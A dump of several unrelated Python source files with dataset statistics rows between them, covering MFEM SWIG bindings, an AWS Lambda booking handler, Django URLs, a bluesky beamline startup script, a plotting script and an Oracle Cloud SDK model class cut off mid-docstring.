LoseDofOffsets = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_LoseDofOffsets)
def LoseTrueDofOffsets(self):
r"""LoseTrueDofOffsets(ParFiniteElementSpace self)"""
return _pfespace.ParFiniteElementSpace_LoseTrueDofOffsets(self)
LoseTrueDofOffsets = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_LoseTrueDofOffsets)
def Conforming(self):
r"""Conforming(ParFiniteElementSpace self) -> bool"""
return _pfespace.ParFiniteElementSpace_Conforming(self)
Conforming = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_Conforming)
def Nonconforming(self):
r"""Nonconforming(ParFiniteElementSpace self) -> bool"""
return _pfespace.ParFiniteElementSpace_Nonconforming(self)
Nonconforming = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_Nonconforming)
def GetTrueTransferOperator(self, coarse_fes, T):
r"""GetTrueTransferOperator(ParFiniteElementSpace self, FiniteElementSpace coarse_fes, OperatorHandle T)"""
return _pfespace.ParFiniteElementSpace_GetTrueTransferOperator(self, coarse_fes, T)
GetTrueTransferOperator = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_GetTrueTransferOperator)
def Update(self, want_transform=True):
r"""Update(ParFiniteElementSpace self, bool want_transform=True)"""
return _pfespace.ParFiniteElementSpace_Update(self, want_transform)
Update = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_Update)
def UpdatesFinished(self):
r"""UpdatesFinished(ParFiniteElementSpace self)"""
return _pfespace.ParFiniteElementSpace_UpdatesFinished(self)
UpdatesFinished = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_UpdatesFinished)
__swig_destroy__ = _pfespace.delete_ParFiniteElementSpace
def PrintPartitionStats(self):
r"""PrintPartitionStats(ParFiniteElementSpace self)"""
return _pfespace.ParFiniteElementSpace_PrintPartitionStats(self)
PrintPartitionStats = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_PrintPartitionStats)
def TrueVSize(self):
r"""TrueVSize(ParFiniteElementSpace self) -> int"""
return _pfespace.ParFiniteElementSpace_TrueVSize(self)
TrueVSize = _swig_new_instance_method(_pfespace.ParFiniteElementSpace_TrueVSize)
# Register ParFiniteElementSpace in _pfespace:
_pfespace.ParFiniteElementSpace_swigregister(ParFiniteElementSpace)
class ConformingProlongationOperator(mfem._par.operators.Operator):
r"""Proxy of C++ mfem::ConformingProlongationOperator class."""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
def __init__(self, pfes):
r"""__init__(ConformingProlongationOperator self, ParFiniteElementSpace pfes) -> ConformingProlongationOperator"""
_pfespace.ConformingProlongationOperator_swiginit(self, _pfespace.new_ConformingProlongationOperator(pfes))
def Mult(self, x, y):
r"""Mult(ConformingProlongationOperator self, Vector x, Vector y)"""
return _pfespace.ConformingProlongationOperator_Mult(self, x, y)
Mult = _swig_new_instance_method(_pfespace.ConformingProlongationOperator_Mult)
def MultTranspose(self, x, y):
r"""MultTranspose(ConformingProlongationOperator self, Vector x, Vector y)"""
return _pfespace.ConformingProlongationOperator_MultTranspose(self, x, y)
MultTranspose = _swig_new_instance_method(_pfespace.ConformingProlongationOperator_MultTranspose)
__swig_destroy__ = _pfespace.delete_ConformingProlongationOperator
# Register ConformingProlongationOperator in _pfespace:
_pfespace.ConformingProlongationOperator_swigregister(ConformingProlongationOperator)
class DeviceConformingProlongationOperator(ConformingProlongationOperator):
r"""Proxy of C++ mfem::DeviceConformingProlongationOperator class."""
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
def __init__(self, pfes):
r"""__init__(DeviceConformingProlongationOperator self, ParFiniteElementSpace pfes) -> DeviceConformingProlongationOperator"""
_pfespace.DeviceConformingProlongationOperator_swiginit(self, _pfespace.new_DeviceConformingProlongationOperator(pfes))
__swig_destroy__ = _pfespace.delete_DeviceConformingProlongationOperator
def Mult(self, x, y):
r"""Mult(DeviceConformingProlongationOperator self, Vector x, Vector y)"""
return _pfespace.DeviceConformingProlongationOperator_Mult(self, x, y)
Mult = _swig_new_instance_method(_pfespace.DeviceConformingProlongationOperator_Mult)
def MultTranspose(self, x, y):
r"""MultTranspose(DeviceConformingProlongationOperator self, Vector x, Vector y)"""
return _pfespace.DeviceConformingProlongationOperator_MultTranspose(self, x, y)
MultTranspose = _swig_new_instance_method(_pfespace.DeviceConformingProlongationOperator_MultTranspose)
# Register DeviceConformingProlongationOperator in _pfespace:
_pfespace.DeviceConformingProlongationOperator_swigregister(DeviceConformingProlongationOperator)
| 50.938731 | 198 | 0.786116 | 2,257 | 23,279 | 7.720868 | 0.130704 | 0.181396 | 0.044761 | 0.062665 | 0.452886 | 0.392632 | 0.178354 | 0.134397 | 0.115919 | 0.056926 | 0 | 0.000746 | 0.136174 | 23,279 | 456 | 199 | 51.050439 | 0.865831 | 0.219039 | 0 | 0.084548 | 1 | 0 | 0.020172 | 0.002529 | 0 | 0 | 0 | 0 | 0 | 1 | 0.189504 | false | 0 | 0.131195 | 0.002915 | 0.699708 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
13e1444089e009cdb21201a2a2458e927f8d0499 | 1,656 | py | Python | src/backend/catalog/src/reserve-flight/reserve.py | BenjaminKayEight/aws-serverless-airline-booking | 6bc18fcf947cdf26bd2aa99bd5cbc2621a0f0272 | [
"MIT-0"
] | 1 | 2021-10-11T11:34:43.000Z | 2021-10-11T11:34:43.000Z | src/backend/catalog/src/reserve-flight/reserve.py | BenjaminKayEight/aws-serverless-airline-booking | 6bc18fcf947cdf26bd2aa99bd5cbc2621a0f0272 | [
"MIT-0"
] | null | null | null | src/backend/catalog/src/reserve-flight/reserve.py | BenjaminKayEight/aws-serverless-airline-booking | 6bc18fcf947cdf26bd2aa99bd5cbc2621a0f0272 | [
"MIT-0"
] | null | null | null | import json
import os
import boto3
from botocore.exceptions import ClientError
session = boto3.Session()
dynamodb = session.resource('dynamodb')
table = dynamodb.Table(os.environ['STAY_TABLE_NAME'])
class StayReservationException(Exception):
pass
class StayFullyBookedException(StayReservationException):
pass
class StayDoesNotExistException(StayReservationException):
pass
def reserve_bed_on_stay(stay_id):
try:
table.update_item(
Key={"id": stay_id},
ConditionExpression="id = :idVal AND bedCapacity > zero",
UpdateExpression="SET bedCapacity = bedCapacity - :dec",
ExpressionAttributeValues={
":idVal": stay_id,
":dec": 1,
":zero": 0
},
)
return {
'status': 'SUCCESS'
}
except dynamodb.meta.client.exceptions.ConditionalCheckFailedException as e:
# Due to no specificity from the DDB error, this could also mean the flight
# doesn't exist, but we should've caught that earlier in the flow.
# TODO: Fix that. Could either use TransactGetItems, or Get then Update.
raise StayFullyBookedException(f"Stay with ID: {stay_id} is fully booked.")
except ClientError as e:
raise StayReservationException(e.response['Error']['Message'])
def lambda_handler(event, context):
if 'stayBookedId' not in event:
raise ValueError('Invalid arguments')
try:
ret = reserve_bed_on_stay(event['stayBookedId'])
except StayReservationException as e:
raise StayReservationException(e)
return json.dumps(ret)
| 28.067797 | 83 | 0.664251 | 175 | 1,656 | 6.205714 | 0.582857 | 0.022099 | 0.022099 | 0.029466 | 0.060773 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003215 | 0.248792 | 1,656 | 58 | 84 | 28.551724 | 0.869775 | 0.126208 | 0 | 0.125 | 0 | 0 | 0.149688 | 0 | 0 | 0 | 0 | 0.017241 | 0 | 1 | 0.05 | false | 0.075 | 0.1 | 0 | 0.275 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
13ec2884fb5fbb8ec4000d0732100243a8d5da7b | 135 | py | Python | courseraoauth2client/commands/__init__.py | sstaudaher/courseraoauth2client | 0cc16b605da75fd833f9c73516f437fa9a45bd17 | [
"Apache-2.0"
] | 7 | 2016-08-19T20:28:42.000Z | 2019-09-03T20:50:56.000Z | courseraoauth2client/commands/__init__.py | sstaudaher/courseraoauth2client | 0cc16b605da75fd833f9c73516f437fa9a45bd17 | [
"Apache-2.0"
] | 9 | 2016-08-08T16:47:26.000Z | 2021-04-29T06:55:14.000Z | courseraoauth2client/commands/__init__.py | sstaudaher/courseraoauth2client | 0cc16b605da75fd833f9c73516f437fa9a45bd17 | [
"Apache-2.0"
] | 9 | 2017-05-26T23:53:58.000Z | 2021-01-21T03:35:28.000Z | "Commands and their implementations for Coursera's OAuth2 client."
__all__ = [
"config",
"version"
]
from . import * # noqa
| 15 | 66 | 0.659259 | 15 | 135 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009615 | 0.22963 | 135 | 8 | 67 | 16.875 | 0.807692 | 0.518519 | 0 | 0 | 0 | 0 | 0.596899 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b91784e3523f77de261a56982d1c84a92e1da5fd | 2,134 | py | Python | Course2/snippets/C2M5.py | KaramSahoo/it-cert-automation | f0b808ced0876699a116c9364baf3693d199bc36 | [
"Apache-2.0"
] | 11 | 2020-05-11T21:00:34.000Z | 2021-10-21T01:15:50.000Z | Course2/snippets/C2M5.py | KaramSahoo/it-cert-automation | f0b808ced0876699a116c9364baf3693d199bc36 | [
"Apache-2.0"
] | 1 | 2020-10-01T10:04:37.000Z | 2020-10-01T10:04:37.000Z | Course2/snippets/C2M5.py | KaramSahoo/it-cert-automation | f0b808ced0876699a116c9364baf3693d199bc36 | [
"Apache-2.0"
] | 10 | 2020-04-20T13:43:53.000Z | 2021-10-21T01:15:31.000Z | #!/usr/bin/env python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# These are the snippets shown during the demo videos in C2M5
# Each snippet is followed by the corresponding output when executed in the
# Python interpreter.
# >>> from rearrange import rearrange_name
#
# >>> rearrange_name("Lovelace, Ada")
# 'Ada Lovelace'
#
# >>> from validations import validate_user
# >>> validate_user("", -1)
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# File "/home/user/validations.py", line 5, in validate_user
# raise ValueError("minlen must be at least 1")
# ValueError: minlen must be at least 1
#
# >>> validate_user("", 1)
# False
# >>> validate_user("myuser", 1)
# True
#
# >>> validate_user(88, 1)
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# File "/home/user/validations.py", line 7, in validate_user
# if len(username) < minlen:
# TypeError: object of type 'int' has no len()
#
# >>> validate_user([], 1)
# False
#
# >>> validate_user(["name"], 1)
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# File "/home/marga/validations.py", line 9, in validate_user
# if not username.isalnum():
# AttributeError: 'list' object has no attribute 'isalnum'
#
#
# >>> from validations import validate_user
#
# >>> validate_user([3], 1)
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# File "/home/marga/validations.py", line 4, in validate_user
# assert type(username) == str, "username must be a string"
# AssertionError: username must be a string
| 32.830769 | 75 | 0.693533 | 305 | 2,134 | 4.803279 | 0.44918 | 0.106485 | 0.038225 | 0.054608 | 0.389079 | 0.36041 | 0.319454 | 0.217065 | 0.217065 | 0.217065 | 0 | 0.017684 | 0.178538 | 2,134 | 64 | 76 | 33.34375 | 0.818026 | 0.941425 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b919533252cfa242d3ab8663e05db1d27e82cfda | 237 | py | Python | image/urls.py | naritotakizawa/kemono | 7ba026fae0b810b6f73111372146e92e5c680101 | [
"MIT"
] | 5 | 2017-10-23T13:42:41.000Z | 2021-01-03T18:26:10.000Z | image/urls.py | naritotakizawa/kemono | 7ba026fae0b810b6f73111372146e92e5c680101 | [
"MIT"
] | null | null | null | image/urls.py | naritotakizawa/kemono | 7ba026fae0b810b6f73111372146e92e5c680101 | [
"MIT"
] | 2 | 2018-12-01T16:57:18.000Z | 2018-12-30T02:46:57.000Z | from django.conf.urls import url
from django.contrib import admin
from image import views
urlpatterns = [
url(r'^$', views.ImageList.as_view(), name='list'),
url(r'^create/$', views.ImageForm.as_view(), name='create'),
] | 29.625 | 65 | 0.675105 | 33 | 237 | 4.787879 | 0.575758 | 0.126582 | 0.126582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.160338 | 237 | 8 | 66 | 29.625 | 0.79397 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
b91b151009705c76a42c02f4adb2809a4b22e8dd | 1,800 | py | Python | startup/00-base.py | NSLS-II-AMX/profile_collection | e73d5aee96db4bcbfcc7ce4d19c3eb8c55bbba13 | [
"BSD-3-Clause"
] | null | null | null | startup/00-base.py | NSLS-II-AMX/profile_collection | e73d5aee96db4bcbfcc7ce4d19c3eb8c55bbba13 | [
"BSD-3-Clause"
] | 8 | 2016-11-30T18:54:58.000Z | 2021-03-03T21:09:37.000Z | startup/00-base.py | NSLS-II-AMX/profile_collection | e73d5aee96db4bcbfcc7ce4d19c3eb8c55bbba13 | [
"BSD-3-Clause"
] | 1 | 2017-05-08T16:00:09.000Z | 2017-05-08T16:00:09.000Z | import os
import matplotlib
from IPython import get_ipython
get_ipython().run_line_magic('matplotlib', 'widget') # i.e. %matplotlib widget
import matplotlib.pyplot
from ophyd import Device, Component, EpicsSignal
from ophyd.signal import EpicsSignalBase
from ophyd.areadetector.filestore_mixins import resource_factory
import uuid
import os
from pathlib import Path
import numpy as np
# Set up a RunEngine and use metadata backed by a sqlite file.
from bluesky import RunEngine
from bluesky.utils import get_history
RE = RunEngine(get_history())
# Set up SupplementalData.
from bluesky import SupplementalData
sd = SupplementalData()
RE.preprocessors.append(sd)
# Set up a Broker.
from databroker import Broker
db = Broker.named('amx')
# and subscribe it to the RunEngine
RE.subscribe(db.insert)
# Add a progress bar.
# from bluesky.utils import ProgressBarManager
# pbar_manager = ProgressBarManager()
# RE.waiting_hook = pbar_manager
# Register bluesky IPython magics.
from bluesky.magics import BlueskyMagics
get_ipython().register_magics(BlueskyMagics)
# Set up the BestEffortCallback.
from bluesky.callbacks.best_effort import BestEffortCallback
bec = BestEffortCallback()
RE.subscribe(bec)
peaks = bec.peaks
# Import matplotlib and put it in interactive mode.
import matplotlib.pyplot as plt
plt.ion()
# Make plots update live while scans run.
from bluesky.utils import install_nb_kicker
install_nb_kicker()
# convenience imports
# some of the * imports are for 'back-compatibility' of a sort -- we have
# taught BL staff to expect LiveTable and LivePlot etc. to be in their
# namespace
import numpy as np
import bluesky.plans as bp
import bluesky.plan_stubs as bps
import bluesky.preprocessors as bpp
#Optional: set any metadata that rarely changes.
RE.md['beamline_id'] = 'AMX' | 26.865672 | 79 | 0.8 | 258 | 1,800 | 5.503876 | 0.488372 | 0.054225 | 0.033803 | 0.046479 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135 | 1,800 | 67 | 80 | 26.865672 | 0.91201 | 0.368889 | 0 | 0.111111 | 0 | 0 | 0.029517 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.638889 | 0 | 0.638889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
b92af46225498f3717fe6790d72e6386e0d37d2d | 333 | py | Python | tools/id-post-amino.py | FrisKal/amino-bot_and_tools | 04837c7d0dfc10b8684342901101cdedb3434e5a | [
"MIT"
] | 1 | 2021-11-07T06:31:21.000Z | 2021-11-07T06:31:21.000Z | tools/id-post-amino.py | FrisKal/amino-bot_and_tools | 04837c7d0dfc10b8684342901101cdedb3434e5a | [
"MIT"
] | null | null | null | tools/id-post-amino.py | FrisKal/amino-bot_and_tools | 04837c7d0dfc10b8684342901101cdedb3434e5a | [
"MIT"
] | null | null | null | import amino
client = amino.Client()
client.login(email='your mail', password='your password')
sub_client = amino.SubClient(comId='id of your community', profile=client.profile)
for title, blogId in zip(sub_client.get_user_blogs('your account id').title, sub_client.get_user_blogs('your account id').blogId):
print(title, blogId)
| 37 | 130 | 0.774775 | 51 | 333 | 4.921569 | 0.490196 | 0.10757 | 0.095618 | 0.12749 | 0.270916 | 0.270916 | 0.270916 | 0.270916 | 0 | 0 | 0 | 0 | 0.093093 | 333 | 8 | 131 | 41.625 | 0.831126 | 0 | 0 | 0 | 0 | 0 | 0.216216 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.166667 | 0.166667 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
b92edddf9b6ddc1aeb23d363eac905cc75fe57f1 | 1,537 | py | Python | python/plotting/cdf.py | jdurbin/sandbox | ee982f7386ae02c5937dbaee867710b5cd2cc71b | [
"MIT"
] | null | null | null | python/plotting/cdf.py | jdurbin/sandbox | ee982f7386ae02c5937dbaee867710b5cd2cc71b | [
"MIT"
] | null | null | null | python/plotting/cdf.py | jdurbin/sandbox | ee982f7386ae02c5937dbaee867710b5cd2cc71b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import matplotlib
import matplotlib.pyplot as plt
from collections import defaultdict
import numpy as np
lengths = defaultdict(list)
lib_count = defaultdict(int)
lib="good"
lengths[lib].append(20)
lengths[lib].append(30)
lengths[lib].append(100)
lengths[lib].append(330)
lengths[lib].append(10)
lengths[lib].append(40)
lengths[lib].append(45)
lengths[lib].append(60)
lengths[lib].append(22)
lengths[lib].append(10)
lib_count[lib]+=10
lib="good"
lengths[lib].append(21)
lengths[lib].append(33)
lengths[lib].append(109)
lengths[lib].append(320)
lengths[lib].append(14)
lengths[lib].append(32)
lengths[lib].append(33)
lengths[lib].append(51)
lengths[lib].append(72)
lengths[lib].append(60)
lib_count[lib]+=10
lib="bad"
lengths[lib].append(12)
lengths[lib].append(13)
lengths[lib].append(24)
lengths[lib].append(300)
lengths[lib].append(7)
lengths[lib].append(35)
lengths[lib].append(25)
lengths[lib].append(45)
lengths[lib].append(19)
lengths[lib].append(8)
lib_count[lib]+=10
libs = sorted(lengths.keys())
print(libs)
for lib in libs:
lengths[lib] = np.array(lengths[lib])
lens = lengths[lib][lengths[lib] != 0]
length_cdf = np.linspace(0, 1, len(lens))
plt.plot(sorted(lens), length_cdf, "-")
plt.xscale("log")
plt.ylabel("Fraction of aligned fragments")
plt.xlabel("Pair size")
plt.title(f"Cumulative distribution (cis-chromosomal pairs only)")
plt.grid(linewidth=0.25)
plt.show()
#plt.savefig(f"{args.output_prefix}_size_cdf_cisonly.{args.output_image_format}")
plt.close()
| 21.957143 | 81 | 0.732596 | 244 | 1,537 | 4.565574 | 0.377049 | 0.305206 | 0.43088 | 0.035009 | 0.189408 | 0.122083 | 0.122083 | 0 | 0 | 0 | 0 | 0.054286 | 0.089135 | 1,537 | 69 | 82 | 22.275362 | 0.741429 | 0.065712 | 0 | 0.232143 | 0 | 0 | 0.073222 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0.017857 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b940ee059e8b714fd7375034122d50ed7b07bb75 | 16,675 | py | Python | src/oci/operator_access_control/models/operator_control_assignment_summary.py | Manny27nyc/oci-python-sdk | de60b04e07a99826254f7255e992f41772902df7 | [
"Apache-2.0",
"BSD-3-Clause"
] | 249 | 2017-09-11T22:06:05.000Z | 2022-03-04T17:09:29.000Z | src/oci/operator_access_control/models/operator_control_assignment_summary.py | Manny27nyc/oci-python-sdk | de60b04e07a99826254f7255e992f41772902df7 | [
"Apache-2.0",
"BSD-3-Clause"
] | 228 | 2017-09-11T23:07:26.000Z | 2022-03-23T10:58:50.000Z | src/oci/operator_access_control/models/operator_control_assignment_summary.py | Manny27nyc/oci-python-sdk | de60b04e07a99826254f7255e992f41772902df7 | [
"Apache-2.0",
"BSD-3-Clause"
] | 224 | 2017-09-27T07:32:43.000Z | 2022-03-25T16:55:42.000Z | # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class OperatorControlAssignmentSummary(object):
"""
Details of the operator control assignment.
"""
#: A constant which can be used with the lifecycle_state property of a OperatorControlAssignmentSummary.
#: This constant has a value of "CREATED"
LIFECYCLE_STATE_CREATED = "CREATED"
#: A constant which can be used with the lifecycle_state property of a OperatorControlAssignmentSummary.
#: This constant has a value of "APPLIED"
LIFECYCLE_STATE_APPLIED = "APPLIED"
#: A constant which can be used with the lifecycle_state property of a OperatorControlAssignmentSummary.
#: This constant has a value of "APPLYFAILED"
LIFECYCLE_STATE_APPLYFAILED = "APPLYFAILED"
#: A constant which can be used with the lifecycle_state property of a OperatorControlAssignmentSummary.
#: This constant has a value of "DELETED"
LIFECYCLE_STATE_DELETED = "DELETED"
def __init__(self, **kwargs):
"""
Initializes a new OperatorControlAssignmentSummary object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param id:
The value to assign to the id property of this OperatorControlAssignmentSummary.
:type id: str
:param operator_control_id:
The value to assign to the operator_control_id property of this OperatorControlAssignmentSummary.
:type operator_control_id: str
:param resource_id:
The value to assign to the resource_id property of this OperatorControlAssignmentSummary.
:type resource_id: str
:param resource_type:
The value to assign to the resource_type property of this OperatorControlAssignmentSummary.
:type resource_type: str
:param compartment_id:
The value to assign to the compartment_id property of this OperatorControlAssignmentSummary.
:type compartment_id: str
:param time_assignment_from:
The value to assign to the time_assignment_from property of this OperatorControlAssignmentSummary.
:type time_assignment_from: datetime
:param time_assignment_to:
The value to assign to the time_assignment_to property of this OperatorControlAssignmentSummary.
:type time_assignment_to: datetime
:param is_enforced_always:
The value to assign to the is_enforced_always property of this OperatorControlAssignmentSummary.
:type is_enforced_always: bool
:param time_of_assignment:
The value to assign to the time_of_assignment property of this OperatorControlAssignmentSummary.
:type time_of_assignment: datetime
:param lifecycle_state:
The value to assign to the lifecycle_state property of this OperatorControlAssignmentSummary.
Allowed values for this property are: "CREATED", "APPLIED", "APPLYFAILED", "DELETED", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type lifecycle_state: str
:param freeform_tags:
The value to assign to the freeform_tags property of this OperatorControlAssignmentSummary.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this OperatorControlAssignmentSummary.
:type defined_tags: dict(str, dict(str, object))
"""
self.swagger_types = {
'id': 'str',
'operator_control_id': 'str',
'resource_id': 'str',
'resource_type': 'str',
'compartment_id': 'str',
'time_assignment_from': 'datetime',
'time_assignment_to': 'datetime',
'is_enforced_always': 'bool',
'time_of_assignment': 'datetime',
'lifecycle_state': 'str',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))'
}
self.attribute_map = {
'id': 'id',
'operator_control_id': 'operatorControlId',
'resource_id': 'resourceId',
'resource_type': 'resourceType',
'compartment_id': 'compartmentId',
'time_assignment_from': 'timeAssignmentFrom',
'time_assignment_to': 'timeAssignmentTo',
'is_enforced_always': 'isEnforcedAlways',
'time_of_assignment': 'timeOfAssignment',
'lifecycle_state': 'lifecycleState',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags'
}
self._id = None
self._operator_control_id = None
self._resource_id = None
self._resource_type = None
self._compartment_id = None
self._time_assignment_from = None
self._time_assignment_to = None
self._is_enforced_always = None
self._time_of_assignment = None
self._lifecycle_state = None
self._freeform_tags = None
self._defined_tags = None
@property
def id(self):
"""
**[Required]** Gets the id of this OperatorControlAssignmentSummary.
The OCID of the operator control assignment.
:return: The id of this OperatorControlAssignmentSummary.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this OperatorControlAssignmentSummary.
The OCID of the operator control assignment.
:param id: The id of this OperatorControlAssignmentSummary.
:type: str
"""
self._id = id
@property
def operator_control_id(self):
"""
**[Required]** Gets the operator_control_id of this OperatorControlAssignmentSummary.
The OCID of the operator control.
:return: The operator_control_id of this OperatorControlAssignmentSummary.
:rtype: str
"""
return self._operator_control_id
@operator_control_id.setter
def operator_control_id(self, operator_control_id):
"""
Sets the operator_control_id of this OperatorControlAssignmentSummary.
The OCID of the operator control.
:param operator_control_id: The operator_control_id of this OperatorControlAssignmentSummary.
:type: str
"""
self._operator_control_id = operator_control_id
@property
def resource_id(self):
"""
**[Required]** Gets the resource_id of this OperatorControlAssignmentSummary.
The OCID of the target resource being governed by the operator control.
:return: The resource_id of this OperatorControlAssignmentSummary.
:rtype: str
"""
return self._resource_id
@resource_id.setter
def resource_id(self, resource_id):
"""
Sets the resource_id of this OperatorControlAssignmentSummary.
The OCID of the target resource being governed by the operator control.
:param resource_id: The resource_id of this OperatorControlAssignmentSummary.
:type: str
"""
self._resource_id = resource_id
@property
def resource_type(self):
"""
Gets the resource_type of this OperatorControlAssignmentSummary.
Type of the target resource being governed by the operator control.
:return: The resource_type of this OperatorControlAssignmentSummary.
:rtype: str
"""
return self._resource_type
@resource_type.setter
def resource_type(self, resource_type):
"""
Sets the resource_type of this OperatorControlAssignmentSummary.
Type of the target resource being governed by the operator control.
:param resource_type: The resource_type of this OperatorControlAssignmentSummary.
:type: str
"""
self._resource_type = resource_type
@property
def compartment_id(self):
"""
**[Required]** Gets the compartment_id of this OperatorControlAssignmentSummary.
The OCID of the compartment that contains the operator control assignment.
:return: The compartment_id of this OperatorControlAssignmentSummary.
:rtype: str
"""
return self._compartment_id
@compartment_id.setter
def compartment_id(self, compartment_id):
"""
Sets the compartment_id of this OperatorControlAssignmentSummary.
The OCID of the compartment that contains the operator control assignment.
:param compartment_id: The compartment_id of this OperatorControlAssignmentSummary.
:type: str
"""
self._compartment_id = compartment_id
@property
def time_assignment_from(self):
"""
Gets the time_assignment_from of this OperatorControlAssignmentSummary.
The time at which the target resource will be brought under the governance of the operator control in `RFC 3339`__ timestamp format. Example: '2020-05-22T21:10:29.600Z'
__ https://tools.ietf.org/html/rfc3339
:return: The time_assignment_from of this OperatorControlAssignmentSummary.
:rtype: datetime
"""
return self._time_assignment_from
@time_assignment_from.setter
def time_assignment_from(self, time_assignment_from):
"""
Sets the time_assignment_from of this OperatorControlAssignmentSummary.
The time at which the target resource will be brought under the governance of the operator control in `RFC 3339`__ timestamp format. Example: '2020-05-22T21:10:29.600Z'
__ https://tools.ietf.org/html/rfc3339
:param time_assignment_from: The time_assignment_from of this OperatorControlAssignmentSummary.
:type: datetime
"""
self._time_assignment_from = time_assignment_from
@property
def time_assignment_to(self):
"""
Gets the time_assignment_to of this OperatorControlAssignmentSummary.
The time at which the target resource will leave the governance of the operator control in `RFC 3339`__timestamp format.Example: '2020-05-22T21:10:29.600Z'
__ https://tools.ietf.org/html/rfc3339
